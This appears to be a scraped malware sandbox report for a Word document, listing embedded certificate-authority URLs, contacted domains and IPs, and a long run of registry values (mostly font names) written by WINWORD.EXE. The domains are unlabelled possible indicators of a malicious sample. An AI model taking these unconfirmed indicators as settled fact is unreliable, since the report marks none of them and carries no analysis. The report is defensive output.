unknown
|
||
https://ca.sia.it/seccli/repository/CPS0
|
unknown
|
||
http://crl.securetrust.com/SGCA.crl0
|
unknown
|
||
http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
|
unknown
|
||
http://crl.securetrust.com/STCA.crl0
|
unknown
|
||
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
|
unknown
|
||
http://www.icra.org/vocabulary/.
|
unknown
|
||
http://www.certicamara.com/certicamaraca.crl0;
|
unknown
|
||
http://www.e-szigno.hu/RootCA.crt0
|
unknown
|
||
http://www.quovadisglobal.com/cps0
|
unknown
|
||
http://investor.msn.com/
|
unknown
|
||
https://sectigo.com/CPS0D
|
unknown
|
||
http://www.valicert.com/1
|
unknown
|
||
http://www.e-szigno.hu/SZSZ/0
|
unknown
|
||
http://www.%s.comPA
|
unknown
|
||
http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
|
unknown
|
||
http://ocsp.entrust.net0D
|
unknown
|
||
http://cps.chambersign.org/cps/chambersignroot.html0
|
unknown
|
||
http://ca.sia.it/secsrv/repository/CRL.der0J
|
unknown
|
||
http://investor.msn.com
|
unknown
|
||
https://sectigo.com/CPS0
|
unknown
|
||
http://crl.entrust.net/server1.crl0
|
unknown
|
||
http://www.ancert.com/cps0
|
unknown
|
||
http://ca.sia.it/seccli/repository/CRL.der0J
|
unknown
|
||
http://www.echoworx.com/ca/root2/cps.pdf0
|
unknown
|
There are 90 hidden URLs, click here to show them.
Domains
Name
|
IP
|
Malicious
|
|
---|---|---|---|
dripsweet.com
|
172.67.215.216
|
||
jbsmediaventures.com
|
192.232.250.227
|
||
r3-tech.biz
|
103.133.214.149
|
||
www.r3-tech.biz
|
unknown
|
IPs
IP
|
Domain
|
Country
|
Active
|
Malicious
|
|
---|---|---|---|---|---|
192.232.250.227
|
unknown
|
United States
|
unknown
|
||
103.133.214.149
|
unknown
|
India
|
unknown
|
||
172.67.215.216
|
unknown
|
United States
|
unknown
|
||
195.159.28.230
|
unknown
|
Norway
|
unknown
|
||
69.38.130.14
|
unknown
|
United States
|
unknown
|
Registry
Path
|
Value
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
))8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
2*8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
++8
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
VBAFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ReviewToken
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ECC35
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
@SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Agency FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aharoni
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Algerian
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Andalus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Angsana New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
AngsanaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Aparajita
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arabic Typesetting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Narrow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Rounded MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Arial Unicode MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Baskerville Old Face
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Batang
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BatangChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bauhaus 93
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bell MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Berlin Sans FB Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bernard MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Blackadder ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bodoni MT Poster Compressed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Book Antiqua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookman Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bookshelf Symbol 7
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Bradley Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Britannic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Broadway
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Browallia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
BrowalliaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Brush Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calibri Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Californian FB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Calisto MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Candara
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Castellar
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Centaur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Century Schoolbook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Chiller
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Colonna MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Comic Sans MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Consolas
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Constantia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cooper Black
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Copperplate Gothic Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Corbel
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cordia New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
CordiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Courier New
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Curlz MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DaunPenh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
David
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DFKai-SB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DilleniaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DokChampa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Dotum
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
DotumChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ebrima
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Edwardian Script ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Elephant
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Engravers MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Bold ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Demi ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Light ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Eras Medium ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Estrangelo Edessa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
EucrosiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Euphemia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FangSong
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Felix Titling
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Footlight MT Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Forte
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Book
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Demi Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Heavy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Franklin Gothic Medium Cond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FrankRuehl
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
FreesiaUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Freestyle Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
French Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gabriola
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Garamond
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gautami
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Georgia
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gigi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans MT Ext Condensed Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gill Sans Ultra Bold Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gisha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gloucester MT Extra Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Old Style
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Goudy Stout
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gulim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GulimChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Gungsuh
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
GungsuhChe
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Haettenschweiler
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harlow Solid Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Harrington
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
High Tower Text
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Impact
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Imprint MT Shadow
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Informal Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
IrisUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Iskoola Pota
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
JasmineUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Jokerman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Juice ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KaiTi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kalinga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kartika
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Khmer UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
KodchiangUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kokila
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kristen ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Kunstler Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lao UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Latha
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Leelawadee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Levenim MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LilyUPC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Bright
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Calligraphy
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Console
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Fax
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Handwriting
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Typewriter
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Lucida Sans Unicode
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Magneto
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Maiandra GD
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Malgun Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mangal
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Marlett
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Matura MT Script Capitals
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Meiryo UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Himalaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft JhengHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft New Tai Lue
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft PhagsPa
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Tai Le
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Uighur
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft YaHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Microsoft Yi Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU_HKSCS-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Miriam Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mistral
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Modern No. 20
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Mongolian Baiti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Monotype Corsiva
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MoolBoran
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Mincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Outlook
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PGothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS PMincho
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Sans Serif
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS Reference Specialty
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MS UI Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MT Extra
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MV Boli
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Narkisim
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Engraved
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Niagara Solid
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
NSimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Nyala
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
OCR A Extended
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Old English Text MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Onyx
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palace Script MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Palatino Linotype
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Papyrus
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Parchment
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Perpetua Titling MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Plantagenet Cherokee
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Playbill
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
PMingLiU-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Poor Richard
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Pristina
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Raavi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rage Italic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Ravie
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rockwell Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Rod
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sakkal Majalla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Script MT Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Print
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Light
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Semibold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Segoe UI Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shonar Bangla
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Showcard Gothic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Shruti
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimHei
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Simplified Arabic Fixed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SimSun-ExtB
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Snap ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Stencil
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Sylfaen
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Symbol
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tempus Sans ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Times New Roman
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Traditional Arabic
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Trebuchet MS
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tunga
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F536D
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
